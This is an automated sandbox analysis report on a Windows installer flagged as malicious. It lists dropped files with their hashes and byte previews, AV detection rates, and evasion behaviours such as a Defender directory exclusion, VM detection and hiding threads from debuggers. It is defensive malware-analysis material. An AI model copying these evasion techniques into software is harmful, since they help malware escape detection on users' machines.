  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1579693 Sample: #U5b89#U88c5#U52a9#U624b_2.... Startdate: 23/12/2024 Architecture: WINDOWS Score: 96 90 Multi AV Scanner detection for dropped file 2->90 92 Multi AV Scanner detection for submitted file 2->92 94 Found driver which could be used to inject code into processes 2->94 96 3 other signatures 2->96 10 #U5b89#U88c5#U52a9#U624b_2.0.4.exe 2 2->10         started        13 cmd.exe 2->13         started        15 cmd.exe 2->15         started        17 32 other processes 2->17 process3 file4 86 C:\...\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp, PE32 10->86 dropped 19 #U5b89#U88c5#U52a9#U624b_2.0.4.tmp 3 5 10->19         started        23 sc.exe 1 13->23         started        25 sc.exe 1 15->25         started        27 sc.exe 1 17->27         started        29 sc.exe 1 17->29         started        31 sc.exe 1 17->31         started        33 28 other processes 17->33 process5 file6 72 C:\Users\user\AppData\Local\...\update.vac, PE32 19->72 dropped 74 C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+ 19->74 dropped 98 Adds a directory exclusion to Windows Defender 19->98 35 #U5b89#U88c5#U52a9#U624b_2.0.4.exe 2 19->35         started        38 powershell.exe 23 19->38         started        41 conhost.exe 23->41         started        43 conhost.exe 25->43         started        45 conhost.exe 27->45         started        47 conhost.exe 29->47         started        49 conhost.exe 31->49         started        51 conhost.exe 33->51         started        53 27 other processes 33->53 signatures7 process8 file9 76 C:\...\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp, PE32 35->76 dropped 55 #U5b89#U88c5#U52a9#U624b_2.0.4.tmp 4 16 35->55         started        100 Loading BitLocker PowerShell Module 38->100 59 conhost.exe 38->59         started        61 WmiPrvSE.exe 38->61         started        signatures10 process11 file12 78 C:\Users\user\AppData\Local\...\update.vac, PE32 55->78 dropped 80 C:\Program Files (x86)\...\trash (copy), PE32+ 55->80 dropped 82 C:\Program Files (x86)\...\is-9PU3N.tmp, PE32+ 55->82 dropped 84 3 other files (1 malicious) 55->84 dropped 102 Query firmware table information (likely to detect VMs) 55->102 104 Protects its processes via BreakOnTermination flag 55->104 106 Hides threads from debuggers 55->106 108 Contains functionality to hide a thread from the debugger 55->108 63 7zr.exe 2 55->63         started        66 7zr.exe 6 55->66         started        signatures13 process14 file15 88 C:\Program Files (x86)\...\tProtect.dll, PE32+ 63->88 dropped 68 conhost.exe 63->68         started        70 conhost.exe 66->70         started        process16

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
#U5b89#U88c5#U52a9#U624b_2.0.4.exe10%VirustotalBrowse
#U5b89#U88c5#U52a9#U624b_2.0.4.exe0%ReversingLabs
SourceDetectionScannerLabelLink
C:\Program Files (x86)\Windows NT\7zr.exe0%ReversingLabs
C:\Program Files (x86)\Windows NT\7zr.exe0%VirustotalBrowse
C:\Program Files (x86)\Windows NT\hrsw.vbc11%ReversingLabs
C:\Program Files (x86)\Windows NT\hrsw.vbc10%VirustotalBrowse
C:\Program Files (x86)\Windows NT\is-9PU3N.tmp0%ReversingLabs
C:\Program Files (x86)\Windows NT\is-9PU3N.tmp0%VirustotalBrowse
C:\Program Files (x86)\Windows NT\tProtect.dll9%ReversingLabs
C:\Program Files (x86)\Windows NT\tProtect.dll4%VirustotalBrowse
C:\Program Files (x86)\Windows NT\trash (copy)0%ReversingLabs
C:\Users\user\AppData\Local\Temp\is-2LMM8.tmp\_isetup\_setup64.tmp0%ReversingLabs
C:\Users\user\AppData\Local\Temp\is-2LMM8.tmp\update.vac11%ReversingLabs
C:\Users\user\AppData\Local\Temp\is-361I0.tmp\_isetup\_setup64.tmp0%ReversingLabs
C:\Users\user\AppData\Local\Temp\is-361I0.tmp\update.vac11%ReversingLabs
No Antivirus matches
No Antivirus matches
No Antivirus matches
No contacted domains info
NameSourceMaliciousAntivirus DetectionReputation
https://aria2.github.io/Usage:#U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000003.1686038392.0000000004539000.00000004.00001000.00020000.00000000.sdmp, is-9PU3N.tmp.5.drfalse
    high
    https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU#U5b89#U88c5#U52a9#U624b_2.0.4.exefalse
      high
      https://github.com/aria2/aria2/issuesReport#U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000003.1686038392.0000000004539000.00000004.00001000.00020000.00000000.sdmp, is-9PU3N.tmp.5.drfalse
        high
        http://www.metalinker.org/#U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000003.1686038392.0000000004539000.00000004.00001000.00020000.00000000.sdmp, is-9PU3N.tmp.5.drfalse
          high
          https://www.remobjects.com/ps#U5b89#U88c5#U52a9#U624b_2.0.4.exe, 00000000.00000003.1675967840.000000007F4AB000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.4.exe, 00000000.00000003.1675593698.0000000002980000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000000.1677364257.0000000000A51000.00000020.00000001.01000000.00000004.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000005.00000000.1700682526.000000000028D000.00000020.00000001.01000000.00000008.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.4.tmp.0.dr, #U5b89#U88c5#U52a9#U624b_2.0.4.tmp.4.drfalse
            high
            https://aria2.github.io/#U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000003.1686038392.0000000004539000.00000004.00001000.00020000.00000000.sdmp, is-9PU3N.tmp.5.drfalse
              high
              https://github.com/aria2/aria2/issues#U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000003.1686038392.0000000004539000.00000004.00001000.00020000.00000000.sdmp, is-9PU3N.tmp.5.drfalse
                high
                https://www.innosetup.com/#U5b89#U88c5#U52a9#U624b_2.0.4.exe, 00000000.00000003.1675967840.000000007F4AB000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.4.exe, 00000000.00000003.1675593698.0000000002980000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000000.1677364257.0000000000A51000.00000020.00000001.01000000.00000004.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000005.00000000.1700682526.000000000028D000.00000020.00000001.01000000.00000008.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.4.tmp.0.dr, #U5b89#U88c5#U52a9#U624b_2.0.4.tmp.4.drfalse
                  high
                  http://www.metalinker.org/basic_string::_M_construct#U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000003.1686038392.0000000004539000.00000004.00001000.00020000.00000000.sdmp, is-9PU3N.tmp.5.drfalse
                    high
                    No contacted IP infos
                    Joe Sandbox version:41.0.0 Charoite
                    Analysis ID:1579693
                    Start date and time:2024-12-23 07:39:38 +01:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 9m 8s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:112
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Critical Process Termination
                    Sample name:#U5b89#U88c5#U52a9#U624b_2.0.4.exe
                    renamed because original name is a hash value
                    Original Sample Name:_2.0.4.exe
                    Detection:MAL
                    Classification:mal96.evad.winEXE@147/32@0/0
                    EGA Information:
                    • Successful, ratio: 100%
                    HCA Information:
                    • Successful, ratio: 76%
                    • Number of executed functions: 66
                    • Number of non-executed functions: 75
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Exclude process from analysis (whitelisted): Conhost.exe
                    • Excluded IPs from analysis (whitelisted): 52.149.20.212
                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size exceeded maximum capacity and may have missing behavior information.
                    • Report size exceeded maximum capacity and may have missing disassembly code.
                    • Report size getting too big, too many NtCreateKey calls found.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    TimeTypeDescription
                    01:40:30API Interceptor1x Sleep call for process: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp modified
                    01:40:33API Interceptor26x Sleep call for process: powershell.exe modified
                    No context
                    No context
                    No context
                    No context
                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    C:\Program Files (x86)\Windows NT\7zr.exeZt43pLXYiu.exeGet hashmaliciousUnknownBrowse
                      #U5b89#U88c5#U52a9#U624b_1.0.9.exeGet hashmaliciousUnknownBrowse
                        Zt43pLXYiu.exeGet hashmaliciousUnknownBrowse
                          #U5b89#U88c5#U52a9#U624b_1.0.1.exeGet hashmaliciousUnknownBrowse
                            #U5b89#U88c5#U52a9#U624b_1.0.8.exeGet hashmaliciousUnknownBrowse
                              #U5b89#U88c5#U52a9#U624b_1.0.9.exeGet hashmaliciousUnknownBrowse
                                #U5b89#U88c5#U52a9#U624b_1.0.1.exeGet hashmaliciousUnknownBrowse
                                  #U5b89#U88c5#U52a9#U624b_1.0.8.exeGet hashmaliciousUnknownBrowse
                                    #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exeGet hashmaliciousUnknownBrowse
                                      #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exeGet hashmaliciousUnknownBrowse
                                        Process:C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp
                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):831200
                                        Entropy (8bit):6.671005303304742
                                        Encrypted:false
                                        SSDEEP:24576:A48I9t/zu2QSM0TMzOCkY+we/86W5gXKxZ5:Ae71MzuiehWIKxZ
                                        MD5:84DC4B92D860E8AEA55D12B1E87EA108
                                        SHA1:56074A031A81A2394770D4DA98AC01D99EC77AAD
                                        SHA-256:BA1EC2C30212F535231EBEB2D122BDA5DD0529D80769495CCFD74361803E3880
                                        SHA-512:CF3552AD1F794582F406FB5A396477A2AA10FCF0210B2F06C3FC4E751DB02193FB9AA792CD994FA398462737E9F9FFA4F19F095A82FC48F860945E98F1B776B7
                                        Malicious:false
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 0%
                                        • Antivirus: Virustotal, Detection: 0%, Browse
                                        Joe Sandbox View:
                                        • Filename: Zt43pLXYiu.exe, Detection: malicious, Browse
                                        • Filename: #U5b89#U88c5#U52a9#U624b_1.0.9.exe, Detection: malicious, Browse
                                        • Filename: Zt43pLXYiu.exe, Detection: malicious, Browse
                                        • Filename: #U5b89#U88c5#U52a9#U624b_1.0.1.exe, Detection: malicious, Browse
                                        • Filename: #U5b89#U88c5#U52a9#U624b_1.0.8.exe, Detection: malicious, Browse
                                        • Filename: #U5b89#U88c5#U52a9#U624b_1.0.9.exe, Detection: malicious, Browse
                                        • Filename: #U5b89#U88c5#U52a9#U624b_1.0.1.exe, Detection: malicious, Browse
                                        • Filename: #U5b89#U88c5#U52a9#U624b_1.0.8.exe, Detection: malicious, Browse
                                        • Filename: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe, Detection: malicious, Browse
                                        • Filename: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe, Detection: malicious, Browse
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9A..} ..} ..} ...<... ...?..~ ...<..t ...?..v ...?... ...(.| ..} ... ...(.t ..K.... ..k_..~ ..K...~ ..f."._ ...R..x ...&..| ..Rich} ..........PE..L....\.d.....................N......:.............@..........................@............@.....................................x........................&.......d......................................................H............................text.............................. ..`.rdata..RZ.......\..................@..@.data...ds... ......................@....sxdata.............................@....rsrc...............................@..@.reloc..2r.......t..................@..B................................................................................................................................................................................................................................................
                                        Process:C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):250000
                                        Entropy (8bit):7.999233217470119
                                        Encrypted:true
                                        SSDEEP:6144:PXyeefmG6AmpTDIX5m4kwCHIgLCSQ+pukav5Ew0rCFBp:PTYNmpn2o4kxO1tR9Fv
                                        MD5:F3E50B3F3BA2DAECD6DFD250FC1FBF59
                                        SHA1:9D9140B5C80B29527B4D80A57EA7EB2977756F56
                                        SHA-256:E02FF764DC2A42E59039C9E73BD6F6D337CB8C7646FC13ABFAA5A0799C3BA20E
                                        SHA-512:F61BE85D5E6AD21B2E1D74B4495F491D1953432E43A4D025C830F8CE6BB49B94CF1355974513FF2979261EFD1FB15DE563ABD2AB32DBAAB88C0721B975634C60
                                        Malicious:false
                                        Preview:.@S...."NtS.,................._.?.....r..~...{Dt*?[.U.@..6....G..jJ0..m...^.. ..S......A........M.O..d...|.......5/$@;....?2&.<....l./..u.,aiG.1+..)..?....M.\.xw..ScRH.h'.4L.........!...i...1.1...3;..@..v7$..e..=V Oo..r...<..'...]dg..6E......i.?[.%.uM.f.'....zi..0^....AM....>.`..y.T.8..;..'.T:.=..R..[.l.>z...%H.m.!.Hu.u)...,.F.M!.....d..Xw.B.s..A._...F..Bs....l|^`...o;.T.5f...#Y...*......V....N..4...{.Q..1.F.z..p.rm....SAlV0.lY]....y.....9~.....x........5..o[.. ...u.g.r.a<o.._...@.eN......B.........U.......B...sM...5..B.}.7Lo.o3..IO..5.;..E..Y:e.......[.v..3d.O.?...k..\.....X9.......C..q..j.,...{.../..J....s......m..1.6.D_.sc`...~.?..@.3.6....!..}6ON.q..Qe..6J....PdJ.....D7.k.S\.......7.a.bM&;.......w.....E.E9l6..+t<.yt..$.xb../ ...A....'.*!.AL......Q....>..@.-...n...O.:.P#..P.Uz_..@.VdH.,#........6.R...z./-_.bBp.u..^`.h....Rt.......dN..G....[l...|.,I...bP.f...<"....aIw..$....}....._yZ..y.....{.....g&.?.......T..Dnr...;.Z..,.._>..=m;9..
                                        Process:C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp
                                        File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):3598848
                                        Entropy (8bit):7.004949099807939
                                        Encrypted:false
                                        SSDEEP:49152:OLI2LSDJWhsk/42oQ6C+NkdkcQdhjee71MzuiehWIKxZUQjOlwz+cxtVI8q29Zlc:OLVLAJG42oaPQdhCe71MzSRsyo29Al
                                        MD5:1D1464C73252978A58AC925ECE57F0FB
                                        SHA1:30E442BE965F96F3EB75A3ABDB61B90E5A506993
                                        SHA-256:05184064FB017025E0704D75D199BAE02EBBD30AE4D76FB237DF9596CE6450AA
                                        SHA-512:40165B34D6BC63472C3874AAC1FB25B19880F5DFE662F672181728732DC80503A64EF4A8058A410755A321D6BDB7314387464DD8243D6E912F37D5032177928A
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 11%
                                        • Antivirus: Virustotal, Detection: 10%, Browse
                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....gg...........!.....b..........%........................................p7...........@.........................HC.......J..<.... 7.X....................07.8?..........................x........................K...............................text...`a.......b.................. ..`.rdata..<............f..............@..@.data................\..............@....00cfg.......`(.......(.............@..@.tls.........p(.......(.............@....voltbl.F.....(...... (..................=~ .........(......"(............. ..`.rsrc...X.... 7.......6.............@..@.reloc..8?...07..@....6.............@..B................................................................................................................................................................................................................................................................................
                                        Process:C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):250000
                                        Entropy (8bit):7.999233217470119
                                        Encrypted:true
                                        SSDEEP:6144:PXyeefmG6AmpTDIX5m4kwCHIgLCSQ+pukav5Ew0rCFBp:PTYNmpn2o4kxO1tR9Fv
                                        MD5:F3E50B3F3BA2DAECD6DFD250FC1FBF59
                                        SHA1:9D9140B5C80B29527B4D80A57EA7EB2977756F56
                                        SHA-256:E02FF764DC2A42E59039C9E73BD6F6D337CB8C7646FC13ABFAA5A0799C3BA20E
                                        SHA-512:F61BE85D5E6AD21B2E1D74B4495F491D1953432E43A4D025C830F8CE6BB49B94CF1355974513FF2979261EFD1FB15DE563ABD2AB32DBAAB88C0721B975634C60
                                        Malicious:false
                                        Preview:.@S...."NtS.,................._.?.....r..~...{Dt*?[.U.@..6....G..jJ0..m...^.. ..S......A........M.O..d...|.......5/$@;....?2&.<....l./..u.,aiG.1+..)..?....M.\.xw..ScRH.h'.4L.........!...i...1.1...3;..@..v7$..e..=V Oo..r...<..'...]dg..6E......i.?[.%.uM.f.'....zi..0^....AM....>.`..y.T.8..;..'.T:.=..R..[.l.>z...%H.m.!.Hu.u)...,.F.M!.....d..Xw.B.s..A._...F..Bs....l|^`...o;.T.5f...#Y...*......V....N..4...{.Q..1.F.z..p.rm....SAlV0.lY]....y.....9~.....x........5..o[.. ...u.g.r.a<o.._...@.eN......B.........U.......B...sM...5..B.}.7Lo.o3..IO..5.;..E..Y:e.......[.v..3d.O.?...k..\.....X9.......C..q..j.,...{.../..J....s......m..1.6.D_.sc`...~.?..@.3.6....!..}6ON.q..Qe..6J....PdJ.....D7.k.S\.......7.a.bM&;.......w.....E.E9l6..+t<.yt..$.xb../ ...A....'.*!.AL......Q....>..@.-...n...O.:.P#..P.Uz_..@.VdH.,#........6.R...z./-_.bBp.u..^`.h....Rt.......dN..G....[l...|.,I...bP.f...<"....aIw..$....}....._yZ..y.....{.....g&.?.......T..Dnr...;.Z..,.._>..=m;9..
                                        Process:C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp
                                        File Type:PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows
                                        Category:dropped
                                        Size (bytes):5649408
                                        Entropy (8bit):6.392614480390128
                                        Encrypted:false
                                        SSDEEP:98304:jgRfP5jnFTyGZEWxSIBHVGT+t1ufqchZ:kRZDFTyGaHIJoWofqc
                                        MD5:8C71B86BF407C05BAF11E8D296B9C8B8
                                        SHA1:6624AB8CA883C48F02C58250D4EEE9E90098F4E4
                                        SHA-256:BE2099C214F63A3CB4954B09A0BECD6E2E34660B886D4C898D260FEBFE9D70C2
                                        SHA-512:BB3FEE727E40F8213F0A7D9808048E341295A684ECBA6F4DF52F1B07B528D7206CA41926B2433F4B63451565AD2854570FEE976BC7051B629ACD24FCA6D0F507
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 0%
                                        • Antivirus: Virustotal, Detection: 0%, Browse
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......................&.ZF..0V..<.............@..............................V.....L.V...`... ...............................................V../...........0O..............`V.\a...........................vL.(.....................V..............................text....XF......ZF.................`..`.data....z...pF..|...^F.............@....rdata.. 9....F..:....F.............@..@.pdata.......0O.......O.............@..@.xdata........Q.......Q.............@..@.bss.....;....U..........................idata.../....V..0....U.............@....CRT....h....@V.......U.............@....tls.........PV.......U.............@....reloc..\a...`V..b....U.............@..B................................................................................................................................................................................................................
                                        Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):56562
                                        Entropy (8bit):7.996582801995233
                                        Encrypted:true
                                        SSDEEP:1536:3F0eJo4+8uBWHKxbKOjr9BhmraXVJ9twDJ0y2Q6XqT5l:36ezuBWHiMaXKmLQ6XqNl
                                        MD5:E769F3D07898BEF062E8B54B4106F3EC
                                        SHA1:F5B22B500440E3CDB0DE8FDCF358315F3F189733
                                        SHA-256:209FEBE4F67AB02005B86988E23CAE0F04BB9792EEE20A022377662BFE27756A
                                        SHA-512:9A3455BD08A5F8CC5996192298B68E9681876080FC2B95F90954143D0931B10B10C3D5590CA5CE78BAD295D9C9B9A6B9FF00E5DEE429D6712C78C28F0B9E6C12
                                        Malicious:false
                                        Preview:.@S......)#\ .............../.q.^J.J...K-..kI(,|....-l.=.bXdT..d.e.H1}..w.....kkO..g<.#.h..k./..J.B.(V.....N.`.mQ.X.=.z..c$.T.n..?T<......8...2|.P=.x..b(.....2..w.p!O.X}.(.Y.&..'n....y!;N2oT.2..\7......64..W.<.>...E...O...:F.2h"|.rq..7.........R.|..V.Z}...Z%..(.E.D.~.?....Va.(....Hx...n.Y...W..F......O~x5AW........:.+.}.H}.8J.0.......9jZ|V...........5 ..Zk....9..?..?2-^..&...E....Y.1f.B9jHR..6.&".?..t.Q];..x...._...//...."....A..G..:...S@R....@:.t.(zp?.L..j....g.KL?h.p....9..+fV.DM.....2{"G.e.....:k.2..L..Z....ga...v...9....}J.HsvBz9. .?..M.F....d.c..!....f.e^H..>.....Okc....3...FHc.x.. ....EF.&.X..e...>..N.a....V........"=9...c....l....G..-z....d ..jW..... ~....m.?...P,m.T.... f..&..!.74..S..<Pw.~....n......~.(t.3.h.?... hL.Q....}.REB..4y...+r.........P..+..[..O.+....6..G.......R..fkJH.C.w...{9(ag.,..*u..s.........>....2...8...$D...C.U5.6.B.W..Q....G..70.h:..lKC..4Q...=...Hw....%...!.x.f.. $..".......4...~.</D.Dx...w..\.Zz=&.~.._..K1|...h....
                                        Process:C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp
                                        File Type:7-zip archive data, version 0.4
                                        Category:dropped
                                        Size (bytes):56562
                                        Entropy (8bit):7.996582801995233
                                        Encrypted:true
                                        SSDEEP:1536:QjaZEp/McY1uLZ39pjWJjrYs7vYCM2nXyfJzc3n+7xrM:eaZZ89rjCj3vrXyfJzc3E2
                                        MD5:19706ECE8EF8BE5854CEF996036FD25D
                                        SHA1:5D6DACF970F731A8629627DB5F5F276541BB5AFA
                                        SHA-256:04D815A3E4CEB9925032A39AB6239F7B95ED761A957483A64373FDCC25913247
                                        SHA-512:6912573C4411CA4EE6044FAA3FA5E7381BDB3285808090FAA80E8F35499439778619DD36A4F2D3DF9589DA0AF52926CCBAD6691AF366F031B6CA31B4B65E5A16
                                        Malicious:false
                                        Preview:7z..'..............2........R.p....]..M............6.s...............Q.'F5#B],...8$..i.<..L.>.........uq.4......}.}.`...V......E$Nb]...m.v.{../.\..."..Yh.D.....X......r..{.p.............(L~.h4....@.*.7I..h..[...DO.h....U...h.%7.&.l.^W.V.: .D.......j...Wv..^...0(.B..C.W9.$a../.u)...hD...s.qRb..i......n4. .Jc}.E.8.+..m.s.....U.d....p...P.-_MqCn......h.MO.`)..x...46_.;.`...-hmA.O.%....N..^..L..!.........H.t.B.....&*R..f.Y...".J...9.G...qd47..k.....$.[g...O.......S.9Ai.j.`+..x..ig.`9.....F].$......tw.W.o0G..g.8..+..[.|*..z......i.../V(.=...]!.h.K......X.......K.J..C....=9aSD.Y.,.....7}A.$D..2.....Ac.....L.i...KC...{4J[.(g>......2h0.RW.<..89~@.Uy.m.[/..Nw..0wD....,+.z...U.j...e.';..M...N....r..ff......S.@..cLE.0.W.....,.F3...5.(W.N.....z~.L...G.b.u)@L)Ua..!....tI.].^..b.Pe..<v]9..l.y.......".E^....}.W...9....q..r*.c..fNR..},?..U..n..........Z.y..m.:......5..Ey....f.WP..)..jv{..ESi.*...CK..@j.k..p./..{.@.2..0..a.y.32.K.......9.%l....K..sQ.
                                        Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):56546
                                        Entropy (8bit):7.996966859255975
                                        Encrypted:true
                                        SSDEEP:1536:crCPEbYP46GiC3q6cGOlLvjmS9UWgvy/F2QFtTVAe:iCIR913q8wjmS9bhKe
                                        MD5:CEA69F993E1CE0FB945A98BF37A66546
                                        SHA1:7114365265F041DA904574D1F5876544506F89BA
                                        SHA-256:E834D26D571776C889E2D09892C6E562EA62CD6524D8FC625E6496A1742F5DBB
                                        SHA-512:4BCBB5AD50446CD4FAD5ED3C530E29CC9DD7DDCB7B912D7C546AF8CCF7DA74BC1EEC397846BFB97858BABC9AA46BB3F3D0434F414BBC3B15B9FDBB7BF3ED59F9
                                        Malicious:false
                                        Preview:.@S....c...l ...............3...Q...R]..u&.(..c...o.A..q?oIS.j..O[..o..&....L)......Rm.jC,./....-=...Z.;..7..tH..f...n#.7.P#..#o..D..y....m........zH.!...M.|......Vs.^.Rb.X`....y.T.Sg....T.....E.?/.H.;h.)P.#.pz.LOG$..."L(.....?.D*.6g.J!.>.....f.....J..B..q...;w]9.v...V...$....L/m.H#..]...G....QQ..'.z.!NW~..R..y....E.)....m.k%....+....>....02../..M....b.l..f7..f?-~_..E.5.~....*.'....8?.n........x...#....9.........q.q.n...\....D.Uv9.9...P.j7P~q9[BV...>C..[F..k-UL(jfT..\..{d.v;.5.e.fb.3^+...Z|]S3G...$..H=.W..c...B...).v.D!...s...+.K...~=..l.2...X.m.-....m0.....p...>...d......e.J..gUr*4....vw.........T.cQ......\...]...Z{..q..n..'Ql.$..V.U9..j 4...9<..6i.....5.F.).k.LQ4.H...2..p.*.bQJ..4.K'C...#.%"q.u../zoXL...L...........'..g11=E.....y.8...~.Oe..X....u.M8.T.....Qq.m.........i....F.4e.([Hm.*...E....2........s. *R..{."4.x.]...-.....xQ@.z.......Bz.).[..C...T..".....q............M.X..CQ..A..........d...`S.3...e.X.....u.>.!..;k...>..
                                        Process:C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp
                                        File Type:7-zip archive data, version 0.4
                                        Category:dropped
                                        Size (bytes):56546
                                        Entropy (8bit):7.996966859255979
                                        Encrypted:true
                                        SSDEEP:1536:cWsX30GkPK2rw7bphKKdxDBxjqtalDFMflaX4:cZXhkPhr+TRJqtaK
                                        MD5:4CB8B7E557C80FC7B014133AB834A042
                                        SHA1:C42E2C861FF3ED0E6A11824E12F67A344E8F783D
                                        SHA-256:3EC6A665E7861DC29A393D00EAA00989112E85C6F1B9643CA6C39578AD772084
                                        SHA-512:A88E78258F7DB4AECD02F164E6A3AFCF39788E30202CF596F9858092027DDB2FDB66D751013A7ABA5201BFAFF9F2D552D345AFE21C8E1D1425ABBC606028C2E6
                                        Malicious:false
                                        Preview:7z..'....O; ........2.......D.X..Z.2..7nf..R..s# s..v.f.....%G..>..9..Jh.-j.r..q.2.=v..Q.....SW7....im..|.c...&...,.s....f.h...C.g~..f.7=9...,...sd....iD......cR.^...$..<....nd...S.O..E)0..SQ.AA.C..$.D.|. a.:..5.....b.....2......W.....Z.pS.b/.F.;|`...O/....@.......4.".b.(...4...,..h/.K$..r!...."..`.S...D?.":...n..f.{C..t..,/.S.0.N..M...v...(.Yn..-.)..-...N~....}..).. .j!...1H.7?R..X.....rKi....9.i[k..+.....Br\.=.k.t8...6Lmh.../.V^K.f.......*.@MM..`...,W.......E..v.H....0.W..~....I.....w....<....X.Azl.FH..6\.a..E?=..I.q.5...s...;.,J.0..J.../.w..,..n.EkN..,j....f.y&q.C}fnY..2\......0.....N!.J..H.H0.....BJ.Q..v}=......^c.'w..#...d.T1....#...2s}N.....2.%.?. ....l.).....a<5Y.s....}...2*.#s..]0h..._G....3].....7y.}.B.6...ywE....'q.....h..?p .#..Emm2..F..| .M.Rv!.v.G....1L.Kx...T...".a6.%S0..g..7.......J.vjO.{.A....B@.c.y>}.....N.+....:.L=[....._.....Y.{....F..|.w.oX..t&[.....a\.M..2.Qe.[}L.Ch[...G.S#.$9...8<..W.d1...*PH.`.....4.A.......?..g.
                                        Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):31890
                                        Entropy (8bit):7.99402458740637
                                        Encrypted:true
                                        SSDEEP:768:rzwmoD5r754TWCxhazPt9GNgRYpSj3PsQ4yVb595nQ/:vwmolXaT9abVzP1TC
                                        MD5:8622FC7228777F64A47BD6C61478ADD9
                                        SHA1:9A7C15F341835F83C96DA804DC1E21FDA696BB56
                                        SHA-256:4E5C193D58B43630E16B6E86C7E4382B26C9A812D6D28905DD39BC7155FEBEE1
                                        SHA-512:71F31079B6C3CE72BC7238560B2CBD012A0285B6A5AC162B18EAE61A059DD3B8DBCF465225E1FB099A1E23ED7BDDF0AAE4ED7C337A10DC20E0FEEC4BC73C5441
                                        Malicious:false
